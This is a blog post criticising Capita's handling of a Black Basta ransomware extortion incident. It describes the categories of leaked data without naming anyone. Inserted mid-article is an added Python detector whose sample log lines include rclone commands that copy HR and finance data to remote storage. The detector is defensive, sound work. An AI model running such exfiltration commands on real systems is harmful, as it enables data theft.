Black Basta ransomware group extorts Capita with stolen customer data, Capita fumble response.

Kevin Beaumont
DoublePulsar


There’s an interesting piece in The Times today, where the CEO of Capita declares Capita’s response to the hack “will go down as a case history for how to deal with a sophisticated cyberattack”.

That’s a bold statement, so let us explore it.

While that may be true on a technical level in terms of containment – it is unclear what happened behind the scenes due to lack of transparency – externally, not so much.

As a bit of background, Capita are one of the largest suppliers of IT in the UK, particularly to government. They look after an enormous amount of critical infrastructure and data.

Let’s start with the outage. Capita declared it an “IT Incident”, not mentioning cybersecurity – even going so far as to deny it was due to cybersecurity issues to media.

The incident started at 5am and was detected by Capita’s Security Operations Centre, according to the interview with the CEO in The Times. The incident was ransomware deployment.

The CEO was informed at 7am. At 10am, The Times reporter Katie Prescott was informed it was too early to say if it was a cyber security attack – despite the company dealing with ransomware:

By 3pm, Capita began insisting to the media and customers it was simply an “IT issue”

By 3pm, Capita were telling press and customers it was an “IT incident”, and ignoring the cybersecurity, ransomware and extortion issue.

It wasn’t until day 3 that they admitted a security angle. Capita’s website still says “there is no evidence of customer, supplier or colleague data having been compromised.” We should test that statement.

The Times reports today “This weekend, the Russian-linked hacking group Black Basta claimed to be behind the attack, listing Capita as a recent victim on its platform.”

Black Basta are an extortion group, who exfiltrate data using rclone and hold companies to ransom. For further information, we go to the US Government:

On their leak portal, Black Basta list Capita as currently being held to extortion – and provide evidence of exfiltrated data. This includes primary and secondary school job applications, a Capita nuclear document, Capita documents marked Confidential, passport scans, security vetting for customers and architecture diagrams.

Specific examples — not exhaustive — of leaked Capita data include:

  • Employment screening for Clifford All Saints Church of England School in Sheffield, including the applicant’s PII: home address, date of birth, history, etc.
  • BACS payment details for Capita Nuclear, part of Capita Business Services. This includes bank account details for 152 organisations.
  • Internal floor plans of multiple buildings.
  • Employment screening for Beighton Nursery Infants School, including the applicant’s PII: home address, date of birth, history, etc.
  • Employment offer for a teaching role at Bradfield Dungworth Primary School in Sheffield, with the signature of the Headteacher and PII of the teaching employee.

This is not abnormal for Black Basta — the group runs double extortion operations, where they first steal data — usually massive amounts — and then encrypt the organisation. They then monetise the situation by blackmailing the organisation for recovery of data, and monetise the data they stole. Currently, they are advertising the sale of Capita’s data (which will almost certainly include more than listed on their portal, given the situation with every other victim organisation so far).
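The exfiltration step of this double-extortion pattern leaves a footprint a SOC can hunt for: rclone (the tool the group uses, as noted above) has a recognisable command-line shape, which survives even when the binary is renamed. The script below is an added illustration for defenders, not code from the original post and not taken from the Capita incident; it scores constructed process-creation events (host, user, image path, command line) on rclone-style transfer syntax, and its sample log lines, thresholds and path heuristics are assumptions for the example.

```python
"""Added example: flag rclone-style data-transfer commands in process-creation logs.
The sample events and scoring weights are constructed for illustration."""
import re
from dataclasses import dataclass

# Constructed sample events, one per line: host|user|image path|command line.
# None of these are real telemetry.
SAMPLE_EVENTS = [
    r"fs01|CORP\svc_backup|C:\Windows\System32\robocopy.exe|robocopy D:\Data E:\Backup /MIR",
    r"fs01|CORP\jdoe|C:\Users\jdoe\AppData\Local\Temp\rclone.exe|rclone.exe copy D:\HR\Screening mega:dump --transfers 32 --config C:\Users\jdoe\r.conf",
    r"fs02|CORP\jdoe|C:\ProgramData\svchost.exe|svchost.exe sync \\fs02\Finance remote:bacs --transfers 16 -q",
    r"ws17|CORP\alice|C:\Program Files\Mozilla Firefox\firefox.exe|firefox.exe https://intranet",
    r"fs01|CORP\svc_backup|C:\Tools\rclone\rclone.exe|rclone.exe listremotes",
]

# rclone subcommands that move data, and flags commonly seen on bulk transfers.
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_FLAGS = {"--transfers", "--config", "--checkers", "--no-check-certificate", "--bwlimit"}

# Directories where a legitimately deployed transfer tool would not normally live (assumption).
USER_WRITABLE_MARKERS = ("\\temp\\", "\\programdata\\", "\\appdata\\")


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: list


def parse_event(line: str):
    """Split a pipe-delimited event into its four fields."""
    host, user, image, cmdline = line.split("|", 3)
    return host, user, image, cmdline


def is_remote_token(token: str) -> bool:
    """True for rclone 'remote:path' syntax. Single-letter names are rejected so
    Windows drive paths (D:\\HR) are not mistaken for remotes; URLs fail because
    the regex forbids slashes after the colon."""
    m = re.fullmatch(r"([A-Za-z][A-Za-z0-9_-]*):[^\\/]*", token)
    return bool(m) and len(m.group(1)) > 1


def score_event(line: str) -> Finding:
    """Accumulate evidence that an event is an rclone-style bulk transfer."""
    host, user, image, cmdline = parse_event(line)
    score, reasons = 0, []

    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if basename in ("rclone.exe", "rclone"):
        score += 2
        reasons.append("rclone binary name")

    # Command-line shape: <image> <verb> <source> <remote:path> [flags]
    argv = cmdline.split()
    verb = argv[1].lower() if len(argv) > 1 else ""
    remotes = [t for t in argv[2:] if is_remote_token(t)]
    if verb in RCLONE_TRANSFER_VERBS and remotes:
        score += 3
        reasons.append(f"{verb} to remote {remotes[0]}")

    flags = sorted({a.split("=")[0].lower() for a in argv if a.startswith("--")} & RCLONE_FLAGS)
    if flags:
        score += len(flags)
        reasons.append("rclone flags " + ",".join(flags))

    if any(marker in image.lower() for marker in USER_WRITABLE_MARKERS):
        score += 1
        reasons.append("binary in user-writable path")

    return Finding(host, user, score, reasons)


def detect(lines, threshold: int = 3):
    """Return findings at or above the alert threshold (default assumed at 3)."""
    return [f for f in (score_event(l) for l in lines) if f.score >= threshold]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding.host} {finding.user} score={finding.score}: {'; '.join(finding.reasons)}")
```

The renamed-binary case (svchost.exe running a sync to remote:bacs from ProgramData) still fires because the verb, remote target and flags are scored independently of the file name, while a bare `rclone listremotes` from an admin tools directory stays below the threshold.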

Capita’s customers and regulators should be asking Capita to explain this – on the record and in writing.

Capita’s duty – from the CEO down – should include protecting customers.

Failing to disclose the loss of personal data can have serious financial and reputation damages – in short, do not cover up ransomware and extortion incidents or you may end up the case history of how not to respond.

The clock is ticking for Capita to change course, be transparent, have ownership and protect society. Cyberattacks happen to every organisation. How you respond to them truly matters.
